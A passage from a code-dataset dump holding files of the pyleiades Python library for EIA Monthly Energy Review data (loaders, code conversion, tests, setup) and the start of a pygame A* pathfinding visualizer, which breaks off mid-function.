nuc_min_month, nuc_min_val = nuc.minima('monthly')\n assert nuc_min_month == nuc_test_min_month\n assert nuc_min_val == nuc_test_min_val\n\n def test_extrema_maximum_month(self, testdata):\n nuc_test_max_month, nuc_test_max_val = pd.Period('197310', 'M'), 0.20\n nuc = Energy('nuclear', data=testdata)\n nuc_max_month, nuc_max_val = nuc.extrema('max', 'monthly')\n assert nuc_max_month == nuc_test_max_month\n assert nuc_max_val == nuc_test_max_val\n\n def test_extrema_minimum_month(self, testdata):\n nuc_test_min_month, nuc_test_min_val = pd.Period('197303', 'M'), 0.09\n nuc = Energy('nuclear', data=testdata)\n nuc_min_month, nuc_min_val = nuc.extrema('min', 'monthly')\n assert nuc_min_month == nuc_test_min_month\n assert nuc_min_val == nuc_test_min_val\n\n def test_extrema_maximum_year(self, testdata):\n valarray = testdata.value.values\n nuc_test_max_year, nuc_test_max_val = pd.Period('1973', 'Y'), 1.30\n nuc = Energy('nuclear', data=testdata)\n nuc_max_year, nuc_max_val = nuc.extrema('max', 'yearly')\n assert nuc_max_year == nuc_test_max_year\n assert nuc_max_val == nuc_test_max_val\n\n def test_extrema_minimum_year(self, testdata):\n nuc_test_min_year, nuc_test_min_val = pd.Period('1972', 'Y'), 0.60\n nuc = Energy('nuclear', data=testdata)\n nuc_min_year, nuc_min_val = nuc.extrema('min', 'yearly')\n assert nuc_min_year == nuc_test_min_year\n assert nuc_min_val == nuc_test_min_val\n\n def test_extrema_invalid_freq(self, testdata):\n nuc = Energy('nuclear', data=testdata)\n with pytest.raises(ValueError):\n nuc_cumulative_total = nuc.extrema('max', 'test')\n\n def test_extrema_invalid_ext(self, testdata):\n nuc = Energy('nuclear', data=testdata)\n with pytest.raises(ValueError):\n nuc_cumulative_total = nuc.extrema('test', 'yearly')\n"
},
{
"alpha_fraction": 0.6289865374565125,
"alphanum_fraction": 0.6293408870697021,
"avg_line_length": 35.17948532104492,
"blob_id": "009e5b0f660d0773b9cc1f0bc263c650959361a2",
"content_id": "aa6ce008f1209fccba75ac13e8ef159b7163e5ff",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2874,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 78,
"path": "/pyleiades/utils/load_data.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "\"\"\"\nUtilities for loading EIA Monthly Energy Review (MER) datasets.\n\nFunctions\n–––––––––\nload_dataset\n Loads an EIA MER dataset from a csv file.\n\"\"\"\nimport os\nimport numpy as np\nimport pandas as pd\nfrom glob import glob\nimport pyleiades\nfrom .code_conversion import code_to_name, code_to_period\n\ndef load_dataset(dataset_date=None, dataset_type=None):\n \"\"\"\n Loads an EIA MER dataset from a csv file.\n\n Parameters\n ––––––––––\n dataset_date : str\n The date identifier of the dataset; 'default' and 'newest' are current\n options (the ability to call specific dataset dates to be added).\n dataset_type : str\n The type of the dataset to be selected; can be either 'production',\n 'consumption', 'import', or 'export' (set as None for default dataset).\n\n Returns\n –––––––\n data_df : DataFrame\n Data from the EIA MER dataset; dataframe contains 3 columns: the date,\n the energy quantitity in quadrillion BTUs, and the code denoting energy\n type\n \"\"\"\n # Get the dataset file corresponding to the date identifier given\n if dataset_date is None:\n data_dir = pyleiades.DATA_DIR\n else:\n data_dir = _find_directory_for_date(dataset_date)\n if dataset_type is None:\n dataset_type = 'consumption'\n data_path = _find_dataset(data_dir, dataset_type)\n # Load and process the dataset file\n data_df = pd.read_csv(data_path, na_values='Not Available',\n dtype={'YYYYMM': str})\n data_df = _format_dataset(data_df)\n return data_df\n\ndef _find_directory_for_date(dataset_date):\n \"\"\"Find the archived directory for a given date, if it exists.\"\"\"\n dated_dir = f'{pyleiades.ARCHIVE_DIR}/EIA_MER_{dataset_date}'\n if os.path.isdir(dated_dir):\n return dated_dir\n else:\n raise ValueError(f\"The dataset for the date '{dataset_date}' \"\n \"could not be found.\")\n\ndef _find_dataset(data_dir, dataset_type):\n \"\"\"Find the filename for the given dataset type, if it exists.\"\"\"\n data_filename = f'EIA_MER_{dataset_type}.csv'\n data_path = f'{data_dir}/{data_filename}'\n if os.path.isfile(data_path):\n return data_path\n else:\n raise ValueError(f\"The '{dataset_type}' type dataset could not be \"\n \"found.\")\n\ndef _format_dataset(data_df):\n \"\"\"Format the dataset for further analysis.\"\"\"\n column_mapping = {'YYYYMM': 'date',\n 'Value': 'value',\n 'Column_Order': 'energy_type'}\n data_df = data_df[list(column_mapping.keys())].dropna()\n data_df = data_df.rename(index=str, columns=column_mapping)\n data_df.energy_type = data_df.energy_type.map(code_to_name)\n data_df.date = data_df.date.map(code_to_period)\n return data_df\n"
},
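A quick usage sketch of `load_dataset` above, with argument values taken from its docstring and the accompanying tests; the `'2019-03'` date identifier is hypothetical and must match an existing `EIA_MER_2019-03` archive directory:

```python
from pyleiades.utils.load_data import load_dataset

# Default call: the bundled consumption dataset.
consumption = load_dataset()

# Select another statistic; per the docstring, valid types are
# 'production', 'consumption', 'import', and 'export'.
production = load_dataset(dataset_type='production')

# Load an archived snapshot (hypothetical identifier; see lead-in).
archived = load_dataset(dataset_date='2019-03')

# The formatted frame always has these three columns.
print(consumption.columns.tolist())  # ['date', 'value', 'energy_type']
```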
{
"alpha_fraction": 0.6911764740943909,
"alphanum_fraction": 0.6911764740943909,
"avg_line_length": 25.60869598388672,
"blob_id": "5394d67d8911cabc79434176f635ccf003b5c378",
"content_id": "5508eee255302ed4f8a64aa8a0a56d1ac6b26ab5",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 630,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 23,
"path": "/pyleiades/utils/inspection.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "\"\"\"\nUtilities for inspecting and checking data.\n\nFunctions\n–––––––––\ncheck_if_method\n Checks to see if a named argument corresponds to a method of a given class.\n\"\"\"\nimport inspect\nimport types\n\ndef check_if_method(instance, name):\n \"\"\"Check if a given name corresponds to a method of a class instance.\"\"\"\n attribute = inspect.getattr_static(instance, name, None)\n if type(attribute) is types.FunctionType:\n flag = True\n else:\n flag = False\n return flag\n\ndef get_period_freqstr(period):\n \"\"\"Get the period `freqstr` attribute from a Period object.\"\"\"\n return period.freqstr\n"
},
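One detail of `check_if_method` worth illustrating: it uses `inspect.getattr_static`, which looks the attribute up without triggering descriptors, so plain functions are distinguished from properties and ordinary data attributes. A small self-contained sketch (independent of pyleiades):

```python
import inspect
import types

class Sample:
    value = 42

    @property
    def computed(self):
        return self.value

    def method(self):
        return self.value

sample = Sample()
for name in ('value', 'computed', 'method'):
    # getattr_static returns the raw class attribute: the property object
    # itself rather than its computed value, the function rather than a
    # bound method.
    attr = inspect.getattr_static(sample, name)
    print(name, type(attr) is types.FunctionType)
# value False, computed False (a property, not a plain function), method True
```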
{
"alpha_fraction": 0.5740740895271301,
"alphanum_fraction": 0.5740740895271301,
"avg_line_length": 12.5,
"blob_id": "e30d2c7b0669c1af321b94b7f6c7b1d1e6afae9b",
"content_id": "1115c599adc165cb2c9f3f0466e2c21a4d1cfaf2",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 54,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 4,
"path": "/.coveragerc",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "[run]\nomit =\n # Omit update script\n */update.py\n"
},
{
"alpha_fraction": 0.680134654045105,
"alphanum_fraction": 0.680134654045105,
"avg_line_length": 27.285715103149414,
"blob_id": "5c0ec42a6f7929256b845f48c33106a250c12bde",
"content_id": "35043a055315fcb33fdf64ec1fd8e1764aa4e0ff",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 594,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 21,
"path": "/tests/test_inspection.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "import pytest\nfrom pyleiades.utils.inspection import check_if_method\n\[email protected]\ndef sample_class_instance():\n class X:\n not_a_method = None\n def method(self):\n pass\n return X()\n\nclass TestInspection:\n\n def test_check_if_method_true(self, sample_class_instance):\n assert check_if_method(sample_class_instance, 'method')\n\n def test_check_if_method_false(self):\n assert not check_if_method(sample_class_instance, 'not_a_method')\n\n def test_check_if_method_missing(self):\n assert not check_if_method(sample_class_instance, 'test')\n"
},
{
"alpha_fraction": 0.6216768622398376,
"alphanum_fraction": 0.6349693536758423,
"avg_line_length": 33.92856979370117,
"blob_id": "ade00d6ad886586862b4b38fceebcc0ce68166d2",
"content_id": "3b09be5bd6eb092fce80b9048dd2f80c75a0d8bc",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 978,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 28,
"path": "/tests/test_load_data.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "import pytest\nfrom pyleiades.utils import load_data\n\nclass TestLoadDataset:\n\n def test_load_dataset_default(self):\n test_df = load_data.load_dataset()\n assert len(test_df) == 23\n assert test_df.value.iloc[0] == 1.1\n assert list(test_df.columns) == ['date', 'value', 'energy_type']\n\n def test_load_dataset_specific_date(self):\n test_df = load_data.load_dataset(dataset_date='test')\n assert len(test_df) == 2\n assert test_df.value.iloc[0] == 7.5\n\n def test_load_dataset_specific_type(self):\n test_df = load_data.load_dataset(dataset_type='production')\n assert len(test_df) == 2\n assert test_df.value.iloc[0] == 2.5\n\n def test_load_dataset_invalid_date(self):\n with pytest.raises(ValueError):\n load_data.load_dataset(dataset_date='fail')\n\n def test_load_dataset_invalid_type(self):\n with pytest.raises(ValueError):\n load_data.load_dataset(dataset_type='fail')\n"
},
{
"alpha_fraction": 0.5719314813613892,
"alphanum_fraction": 0.585777997970581,
"avg_line_length": 31.037593841552734,
"blob_id": "5752c8977b5e8a31cdb0a8d1bf4c49ea6cb169e1",
"content_id": "9ea4f618639715a147c14ac8d10b7d5ff99c9904",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4381,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 133,
"path": "/pyleiades/utils/code_conversion.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "\"\"\"\nUtilities for converting EIA dataset codes into meaningful information.\n\nFunctions\n–––––––––\nname_to_code\n Converts energy names into EIA energy codes.\ndate_to_code\n Converts date string into EIA data code.\n\"\"\"\nimport datetime\nimport pandas as pd\n\nEIA_CODES = {1: 'coal',\n 2: 'natural gas',\n 3: 'petroleum',\n 4: 'fossil fuel',\n 5: 'nuclear',\n 6: 'hydro',\n 7: 'geothermal',\n 8: 'solar',\n 9: 'wind',\n 10: 'biomass',\n 11: 'renewable',\n 12: 'primary'}\n\ndef code_to_name(code):\n \"\"\"\n Convert an EIA dataset numeric code to its corresponding energy source name.\n\n Parameters\n ––––––––––\n code : int\n The code corresponding to a specific energy source.;\n\n Returns\n –––––––\n name : str\n The name of an EIA energy or energy group.\n \"\"\"\n if code not in EIA_CODES:\n raise KeyError(f\"Code '{code}' does not correspond to an EIA energy \"\n \"code.\")\n else:\n name = EIA_CODES[code]\n return name\n\ndef code_to_period(code):\n \"\"\"\n Convert an EIA date code (YYYYMM) into a pandas period.\n\n EIA date codes are given as 'YYYYMM'. The month value can be either 1-12\n for the standard months, or 13 for a yearly total. This function processes\n the date code and outputs a pandas period object matching the date code.\n\n Parameters\n ––––––––––\n code : str\n The six digit date code to be converted into a pandas period.\n\n Returns\n –––––––\n period : Period object\n The pandas period object corresponding to the given date code.\n \"\"\"\n month_code = int(code[-2:])\n if month_code == 13:\n period = pd.Period(code[:-2], 'Y')\n elif month_code in range(1,13):\n period = pd.Period(code, 'M')\n else:\n raise ValueError(f\"Date code '{code}' is not a valid date.\")\n return period\n\ndef parse_input_date(date):\n \"\"\"\n Process an input date to a format that can be compared with the data.\n\n Parses a date given in a variety of string formats by a user into a pandas\n period object. 
This period object can be compared easily against the period\n objects of the dataset.\n\n Parameters\n ––––––––––\n date : str\n A date, given in the format 'YYYY','YYYYMM', 'YYYY-MM', or 'MM-YYYY'.\n Dashes can be substituted for periods, underscores, or forward slashes.\n\n Returns\n –––––––\n period : Period object\n The pandas period object corresponding to the input energy.\n \"\"\"\n bad_format_err_msg = (f'Date \"{date}\" was not given in an acceptable '\n 'format; try formatting date as \"YYYYMM\".')\n acceptable_separators = ['-', '.', '/', '_']\n\n # Convert date to code\n if len(date) == 4:\n # Only a year was given, consider the whole year\n date += '13'\n elif len(date) == 7:\n for separator in acceptable_separators[1:]:\n date = date.replace(separator, acceptable_separators[0])\n date_list = date.split(acceptable_separators[0])\n if len(date_list) != 2:\n raise ValueError(bad_format_err_msg.format(date))\n # Check whether the first or second entry is the year\n if len(date_list[0]) == 4:\n date = ''.join(date_list)\n elif len(date_list[1]) == 4:\n date = ''.join(date_list[::-1])\n else:\n raise ValueError(bad_format_err_msg.format(date))\n elif len(date) != 6:\n raise ValueError(bad_format_err_msg.format(date))\n\n # Check reasonability of date provided\n try:\n # The date must be able to be expressed numerically\n int(date)\n except:\n raise ValueError(bad_format_err_msg.format(date))\n year = int(date[:4])\n month = int(date[4:])\n if year < 1900 or year > datetime.datetime.now().year:\n raise ValueError('Data only exists from the middle of the 20th '\n 'century to the present.')\n if month > 13 or month < 1: # 13 denotes full year sum\n raise ValueError('A month must be given as a number 1-12 (or use 13 '\n 'to denote a full year.')\n period = code_to_period(date)\n return period\n"
},
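The docstrings above spell out the accepted date formats; a short sketch exercising `code_to_period` and `parse_input_date` (the expected values match the test suite later in this section):

```python
import pandas as pd
from pyleiades.utils.code_conversion import code_to_period, parse_input_date

# Month 13 in an EIA date code denotes the full-year total.
assert code_to_period('202013') == pd.Period('2020', 'Y')
assert code_to_period('202001') == pd.Period('2020-01', 'M')

# parse_input_date accepts 'YYYY', 'YYYYMM', 'YYYY-MM' or 'MM-YYYY',
# with '-', '.', '/' or '_' as separators.
assert parse_input_date('2017') == pd.Period('2017', 'Y')
assert parse_input_date('08-2017') == pd.Period('2017-08', 'M')
assert parse_input_date('2017/08') == pd.Period('2017-08', 'M')
```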
{
"alpha_fraction": 0.6439674496650696,
"alphanum_fraction": 0.6561806201934814,
"avg_line_length": 41.88888931274414,
"blob_id": "e48395e5d2680a26ad7651c65cdba3bbf4f46551",
"content_id": "d127c27e81d420d20c0a5d5e670a517d0e6bf060",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2702,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 63,
"path": "/tests/test_visuals.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "import pytest\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom pyleiades.visuals import Visual\n\nclass TestVisual:\n\n def test_initialze_with_string(self, testdata):\n nuc_test_data = testdata.iloc[7:].value\n visual = Visual('nuclear', data=testdata)\n nuc_energy_data = visual.energies[0].energy_data.value\n assert 'nuclear' == visual.energies[0].energy_type\n assert nuc_energy_data.equals(nuc_test_data)\n\n def test_initialze_with_list(self, testdata):\n nuc_test_data = testdata.iloc[7:].value\n visual = Visual(['nuclear', 'coal'], data=testdata)\n nuc_energy_data = visual.energies[0].energy_data.value\n assert 'nuclear' == visual.energies[0].energy_type\n assert 'coal' == visual.energies[1].energy_type\n assert nuc_energy_data.equals(nuc_test_data)\n\n def test_initialze_invalid(self, testdata):\n with pytest.raises(ValueError):\n visual = Visual(123, data=testdata)\n\n def test_include_energy(self, testdata):\n nuc_test_data = testdata.iloc[7:].value\n visual = Visual(data=testdata)\n visual.include_energy('nuclear', 'coal')\n nuc_energy_data = visual.energies[0].energy_data.value\n assert 'nuclear' == visual.energies[0].energy_type\n assert 'coal' == visual.energies[1].energy_type\n assert nuc_energy_data.equals(nuc_test_data)\n\n def test_linegraph_no_energies(self, testdata):\n visual = Visual(data=testdata)\n with pytest.raises(RuntimeError):\n ax = visual.linegraph()\n\n def test_linegraph_default_totals(self, testdata, testvals):\n nuc_test_totals = np.array([testvals[7], testvals[20]])\n visual = Visual(data=testdata)\n visual.include_energy('nuclear')\n ax = visual.linegraph()\n nuc_default_totals = ax.lines[0].get_xydata().T[1]\n assert np.array_equal(nuc_default_totals, nuc_test_totals)\n\n def test_linegraph_yearly_totals(self, testdata, testvals):\n nuc_test_totals = np.array([testvals[7], testvals[20]])\n visual = Visual(data=testdata)\n visual.include_energy('nuclear')\n ax = visual.linegraph(freq='yearly')\n nuc_yearly_totals = ax.lines[0].get_xydata().T[1]\n assert np.array_equal(nuc_yearly_totals, nuc_test_totals)\n\n def test_linegraph_monthly_totals(self, testdata, testvals):\n nuc_test_totals = np.concatenate([testvals[8:20], testvals[21:23]])\n visual = Visual(data=testdata)\n visual.include_energy('nuclear')\n ax = visual.linegraph(freq='monthly')\n nuc_monthly_totals = ax.lines[0].get_xydata().T[1]\n assert np.array_equal(nuc_monthly_totals, nuc_test_totals)\n"
},
{
"alpha_fraction": 0.7678571343421936,
"alphanum_fraction": 0.7678571343421936,
"avg_line_length": 55,
"blob_id": "f3aa617db9b6dd72bda5c5489b747bdb8874088d",
"content_id": "32690c624f26695474658e4b847e394fa5b3d100",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 56,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 1,
"path": "/pyleiades/utils/__init__.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "\"\"\"General utilities for project and data management\"\"\"\n"
},
{
"alpha_fraction": 0.7322993874549866,
"alphanum_fraction": 0.7336480021476746,
"avg_line_length": 33.488372802734375,
"blob_id": "e170e0f08bfc217dd68f3e4a581fe62fb63f5796",
"content_id": "dc53360ddf1a0b98306fe4ba2ca5fd31fae0d405",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1483,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 43,
"path": "/setup.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\n\"\"\"\npyleiades: Python Library for EIA Data Examination & Exhibition\n\nTools to use with the EIA Monthly Energy Review datasets. This package provides\nan API for performing more sophisticated examination and visualization of the\nEnergy Information Administration (EIA) Monthly Energy Review (MER) datasets.\n\nData can be accessed directly at the EIA website:\n https://www.eia.gov/totalenergy/data/browser/\n\"\"\"\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nfrom os import path\n\npackage_name = 'pyleiades'\nproject_dir = path.abspath(path.dirname(__file__))\npackage_dir = path.join(project_dir, package_name)\n# Read the contents of the _version file\nwith open(path.join(package_dir, '_version')) as version_file:\n version = version_file.read().strip()\n# Read the contents of the README file\nwith open(path.join(project_dir, 'README.md'), encoding='utf-8') as readme_file:\n long_description = readme_file.read()\n\nsetup(\n name=package_name,\n version=version,\n description='An API for examing the EIA Monthly Energy Review datasets.',\n author='Mitch Negus',\n author_email='[email protected]',\n license='FreeBSD',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/mitchnegus/pyleiades',\n packages=['pyleiades', 'pyleiades.utils'],\n scripts=['scripts/update_eia_data.py', 'scripts/pyleiades-demo.py'],\n include_package_data=True\n)\n"
},
{
"alpha_fraction": 0.5799798965454102,
"alphanum_fraction": 0.6302816867828369,
"avg_line_length": 28.235294342041016,
"blob_id": "c2feb2c16d29ac60095231666bfd3b20b00a1125",
"content_id": "e9f796a75c0e50b7021b4343409654c891935046",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1988,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 68,
"path": "/tests/test_code_conversion.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "import pytest\nimport pandas as pd\nfrom pyleiades.utils.code_conversion import code_to_name as ctn\nfrom pyleiades.utils.code_conversion import code_to_period as ctp\nfrom pyleiades.utils.code_conversion import parse_input_date as parser\n\nclass TestCTN:\n\n def test_convert_name(self):\n assert ctn(1) == 'coal'\n\n def test_invalid_entry(self):\n with pytest.raises(KeyError):\n ctn('test')\n\nclass TestCTP:\n\n def test_yearly_code(self):\n assert ctp('202013') == pd.Period('2020', 'Y')\n\n def test_monthly_code(self):\n assert ctp('202001') == pd.Period('202001', 'M')\n\n def test_invalid_code(self):\n with pytest.raises(ValueError):\n ctp('test24')\n\nclass TestDateParser:\n\n def test_read_format_yyyy(self):\n assert parser('2017') == pd.Period('2017', 'Y')\n\n def test_read_format_yyyymm(self):\n assert parser('201708') == pd.Period('2017-08', 'M')\n\n def test_read_format_yyyy_mm(self):\n assert parser('2017-08') == pd.Period('2017-08', 'M')\n\n def test_read_format_mm_yyyy(self):\n assert parser('08-2017') == pd.Period('2017-08', 'M')\n\n def test_read_format_invalid_separator_position(self):\n with pytest.raises(ValueError):\n parser('8-22-17')\n\n def test_read_format_invalid_nonspecific_year(self):\n with pytest.raises(ValueError):\n parser('082-017')\n\n def test_read_format_invalid_nonspecific_date(self):\n with pytest.raises(ValueError):\n parser('17')\n\n def test_read_format_invalid_characters(self):\n with pytest.raises(ValueError):\n parser('1500ad')\n\n def test_read_format_invalid_year_early(self):\n with pytest.raises(ValueError):\n parser('1500')\n\n def test_read_format_invalid_year_late(self):\n with pytest.raises(ValueError):\n parser('5650')\n\n def test_read_format_invalid_month(self):\n with pytest.raises(ValueError):\n parser('200055')\n"
},
{
"alpha_fraction": 0.6105263233184814,
"alphanum_fraction": 0.6105263233184814,
"avg_line_length": 18,
"blob_id": "7f23eb8c5eb16e5aadd9a4a8d086a64803fb1aa7",
"content_id": "40b562b759e6f1fe569401fc0ebd5dbd968315ad",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 95,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 5,
"path": "/scripts/update_eia_data.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nfrom pyleiades.update import main\n\nif __name__ == '__main__':\n main()\n"
}
] | 22 |
oognuyh/astar-visualization
|
https://github.com/oognuyh/astar-visualization
|
7491a8bb8f96b5252967ae742e00b2c280ec23f7
|
f8b452629da7056d8cdb8f1055ff0ddc4d423cd4
|
19b0ac741d412f640e54a9a16be42055ba75dd69
|
refs/heads/master
| 2023-01-29T08:59:30.044093 | 2020-11-30T15:04:55 | 2020-11-30T15:04:55 | 224,227,261 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4781047999858856,
"alphanum_fraction": 0.48861655592918396,
"avg_line_length": 36.943580627441406,
"blob_id": "2c147584fe73f5bd516b1349c73b0cb121471ba0",
"content_id": "b1c9ee2a958a0a751e2e6aabc4b2ca21b3056bdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 19502,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 514,
"path": "/visual_astar.py",
"repo_name": "oognuyh/astar-visualization",
"src_encoding": "UTF-8",
"text": "# --------------------------------------------\n# by oognuyh\n# --------------------------------------------\nimport sys, os, heapq, math\nimport pygame as pg\nfrom pygame.locals import *\n# --------------------------------------------\n# TODO: \n# 1. wrong path when user allow diagonal lines(in_in_open() not changed the cell) - FIX 2019/11/27\n# --------------------------------------------\n# pygame initialize\npg.init()\n# center\nos.environ['SDL_VIDEO_CENTERED'] = '1'\npg.display.set_caption(\"A* visualization\")\nwidth = 800\nheight = 800\nmenuside = 270\nscreen = pg.display.set_mode((width + menuside, height))\n# --------------------------------------------\n# define points\nPATH = 0\nWALL = 1\nSTART = 2\nEND = 3\n# --------------------------------------------\n# define colours\nBLACK = (0, 0, 0) # wall, outline, background\nYELLOW = (255, 192, 0) # cell in open list\nRED = (157, 0, 0) # the starting point\nORANGE = (237, 125, 49) # cell in closed list\nBLUE = (68, 114, 196) # the current cell\nGREEN = (0, 157, 0) # the ending point\nGREY = (157, 157, 157) # path\nWHITE = (255, 255, 255) # text colour\n# --------------------------------------------\n# define cell size, grid height and grid width\ncellsize = 40\ngridheight = height // cellsize\ngridwidth = width // cellsize\n# --------------------------------------------\n# define heuristic weight limit\nweightlimit = 50\n# --------------------------------------------\n# define FPS\nFPS = 60\n# --------------------------------------------\n# define font\noptionfont = pg.font.Font(\"PrStart.ttf\", cellsize // 2)\n# --------------------------------------------\n# define directions\nUP = [0, -1]\nDOWN = [0, 1]\nLEFT = [-1, 0]\nRIGHT = [1, 0]\nTOPLEFT = [-1, -1]\nTOPRIGHT = [1, -1]\nBOTTOMLEFT = [-1, 1]\nBOTTOMRIGHT = [1, 1]\n# --------------------------------------------\nclass Cell:\n def __init__(self, coord):\n self.coord = coord\n self.parent = None # parent cell's coord\n self.G = 0 # G cost\n self.H = 0 # H cost\n self.F = 0 # F cost\n\n def __lt__(self, other): # define operator <\n return self.F < other.F \n\n def __eq__(self, other): # define operator ==\n return self.coord == other.coord\n\n def draw(self, colour): \n x, y = self.coord\n pg.display.update(pg.draw.rect(screen, colour, (x * cellsize, y * cellsize, cellsize, cellsize)))\n pg.display.update(pg.draw.rect(screen, BLACK, (x * cellsize, y * cellsize, cellsize, cellsize), 1)) # outline\n\nclass Astar:\n def __init__(self, grid, start, end, weight, using, diagonal, open_is_heapq):\n self.grid = grid\n self.start = list(start) # the starting point\n self.end = list(end) # the ending point\n self.using = using # to get heuristic\n self.diagonal = diagonal # if allow diagonal lines, True \n self.weight = weight # heuristic weight\n self.closed = [] # closed list\n self.open = [] # open list\n self.open_is_heapq = open_is_heapq\n if self.open_is_heapq:\n heapq.heapify(self.open) # list into heap\n\n def is_valid(self, coord):\n x, y = coord\n return -1 < x and x < gridwidth and -1 < y and y < gridheight and self.grid[x][y] != WALL and not self.is_in_closed(coord)\n\n def is_in_closed(self, coord): # if the cell is already in the closed list, return true\n for exist in self.closed:\n if coord == exist.coord:\n return True\n return False\n\n def is_in_open(self, cell): # if the cell isn't in the open list, return False\n for exist in range(len(self.open)):\n if self.open[exist] == cell: # if already exist, compare\n if cell < self.open[exist]:\n self.open[exist] = 
cell\n\n return True\n\n return False\n\n def calculate_heuristic(self, coord): \n # There are 4 ways to get H cost\n # 1. Manhattan distance\n # 2. euclidean distance\n # 3. chebyshev distance\n # 4. octile distance(new)\n x, y = coord\n endX, endY = self.end\n xDiff = abs(x - endX) * self.weight\n yDiff = abs(y - endY) * self.weight\n\n if self.using == \"manhattan\":\n return xDiff + yDiff\n elif self.using == \"euclidean\":\n return math.sqrt(xDiff ** 2 + yDiff ** 2)\n elif self.using == \"chebyshev\":\n return max(xDiff, yDiff)\n elif self.using == \"octile\":\n return min(xDiff, yDiff) * math.sqrt(2) + max(xDiff, yDiff) - min(xDiff, yDiff)\n\n def neighbours(self, cell):\n # visit neighbors(4 or 8 directions)\n # TOPLEFT UP TOPRIGHT\n # LEFT HEAD RIGHT\n # BOTTOMLEFT DOWN BOTTOMRIGHT\n up = add(cell.coord, UP)\n down = add(cell.coord, DOWN)\n right = add(cell.coord, RIGHT)\n left = add(cell.coord, LEFT)\n display = []\n if self.diagonal: # if user allowed diagonal lines, visit 8 directions\n topright = add(cell.coord, TOPRIGHT)\n topleft = add(cell.coord, TOPLEFT)\n bottomright = add(cell.coord, BOTTOMRIGHT)\n bottomleft = add(cell.coord, BOTTOMLEFT)\n\n if self.is_valid(topright):\n neighbour = Cell(topright)\n neighbour.parent = cell.coord\n neighbour.G = cell.G + 14\n neighbour.H = self.calculate_heuristic(neighbour.coord)\n neighbour.F = neighbour.G + neighbour.H\n if not self.is_in_open(neighbour):\n if self.open_is_heapq:\n heapq.heappush(self.open, neighbour)\n else:\n self.open.append(neighbour) # if the open list is list\n \n if self.is_valid(topleft):\n neighbour = Cell(topleft)\n neighbour.parent = cell.coord\n neighbour.G = cell.G + 14\n neighbour.H = self.calculate_heuristic(neighbour.coord)\n neighbour.F = neighbour.G + neighbour.H\n if not self.is_in_open(neighbour):\n if self.open_is_heapq:\n heapq.heappush(self.open, neighbour)\n else:\n self.open.append(neighbour) # if the open list is list\n \n if self.is_valid(bottomright):\n neighbour = Cell(bottomright)\n neighbour.parent = cell.coord\n neighbour.G = cell.G + 14\n neighbour.H = self.calculate_heuristic(neighbour.coord)\n neighbour.F = neighbour.G + neighbour.H\n if not self.is_in_open(neighbour):\n if self.open_is_heapq:\n heapq.heappush(self.open, neighbour)\n else:\n self.open.append(neighbour) # if the open list is list \n\n if self.is_valid(bottomleft):\n neighbour = Cell(bottomleft)\n neighbour.parent = cell.coord\n neighbour.G = cell.G + 14\n neighbour.H = self.calculate_heuristic(neighbour.coord)\n neighbour.F = neighbour.G + neighbour.H\n if not self.is_in_open(neighbour):\n if self.open_is_heapq:\n heapq.heappush(self.open, neighbour)\n else:\n self.open.append(neighbour) # if the open list is list\n \n if self.is_valid(up):\n neighbour = Cell(up)\n neighbour.parent = cell.coord\n neighbour.G = cell.G + 10 \n neighbour.H = self.calculate_heuristic(neighbour.coord)\n neighbour.F = neighbour.G + neighbour.H # F-cost = G-cost + H-cost\n if not self.is_in_open(neighbour): # if neighbor doesn't exist in the open list, push\n if self.open_is_heapq:\n heapq.heappush(self.open, neighbour)\n else:\n self.open.append(neighbour) # if the open list is list\n\n if self.is_valid(down):\n 